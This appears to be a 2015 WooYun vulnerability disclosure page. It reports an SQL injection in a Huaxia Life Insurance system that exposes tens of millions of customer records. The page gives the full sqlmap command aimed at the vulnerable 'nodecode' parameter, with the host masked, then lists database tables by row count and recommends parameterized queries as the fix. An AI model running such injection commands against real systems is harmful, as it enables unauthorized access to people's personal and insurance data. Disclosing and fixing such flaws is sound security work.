当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0160431

漏洞标题:华夏人寿某系统存在SQL注入漏洞(支持union近6KW用户信息)

相关厂商:华夏人寿

漏洞作者: 路人甲

提交时间:2015-12-11 17:54

修复时间:2016-01-28 17:10

公开时间:2016-01-28 17:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-11: 细节已通知厂商并且等待厂商处理中
2015-12-15: 厂商已经确认,细节仅向厂商公开
2015-12-25: 细节向核心白帽子及相关领域专家公开
2016-01-04: 细节向普通白帽子公开
2016-01-14: 细节向实习白帽子公开
2016-01-28: 细节向公众公开

简要描述:

SQL注入漏洞,近6KW用户信息

详细说明:

QQ截图20151211151418.png


python SQLMap/SQLMap.py -u "http://**.**.**.**/ui/logon/station.jsp?nodecode=1&Flag=XYW&ChangeCom=1&nodesrc=1" --time-sec 6 --risk 3 --level 3 --current-db --dbms oracle -p "nodecode"


QQ截图20151211143848.png


QQ截图20151211151601.png

漏洞证明:

QQ截图20151211151635.png


QQ截图20151211151734.png


表行数大于100w的有39张

[*] LZCARD, 20667552
[*] LZCARDBAK, 1805682
[*] LZCARDTRACK, 2654791
[*] LZCARDTRACK_0607, 3326958
[*] LZCARDTRACK_20120704, 1954144
[*] LZCARD_0607, 1533692
[*] QLCCONT, 59605044
[*] QLCCONT_20110422, 2003425
[*] SLCAPPNT, 2789751
[*] SLCAPPNT_20110422, 2466032
[*] SLCAPPNT_20120704, 1225600
[*] SLCCONT, 2876248
[*] SLCCONT_20110422, 2465883
[*] SLCCONT_20120704, 1225599
[*] SLCDUTY, 5555842
[*] SLCDUTY_20110422, 2493482
[*] SLCDUTY_20120704, 1231047
[*] SLCINSURED, 2789757
[*] SLCINSURED_20110422, 2466048
[*] SLCINSURED_20120704, 1225600
[*] SLCPOL, 2710132
[*] SLCPOL_20110422, 2471977
[*] SLCPOL_20120704, 1228542
[*] SLDPERSON, 2013828
[*] SLDPERSON_20110422, 1802434
[*] YONGCHECONTNO, 10883118
[*] TIMELOG, 14529755
[*] T_APP_CANCEL, 1265698
[*] T_APPLICATION_BAK_20140101, 14773752
[*] T_CUSTOMER, 27072680
[*] T_ESS_QUEUE, 4976679
[*] T_SMS, 3412395
[*] T_APPLICATION, 10697823
[*] T_APPLICATION2014, 10781146
[*] T_CTRIP_NEWCONT, 2642010
[*] T_CTRIP_LOG, 2852031
[*] GLCDUTY, 3563706
[*] GLCGET, 8533138
[*] GLCPOL, 2844400


T_CUSTOMER (27072680)前10行

QQ截图20151211152014.png


QLCCONT(59605044) 前10行

QQ截图20151211152245.png


QQ截图20151211152259.png

修复方案:

参数化查询

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-12-15 14:45

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向保险行业信息化主管部门通报,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评价

  1. 2015-12-11 22:13 | VMApire ( 路人 | Rank:6 漏洞数:1 | ★财神网络★欢迎各位大牛加入)

    招收各种技术大牛,看我个人主页。工资承诺:比你现在工作的工资多几倍。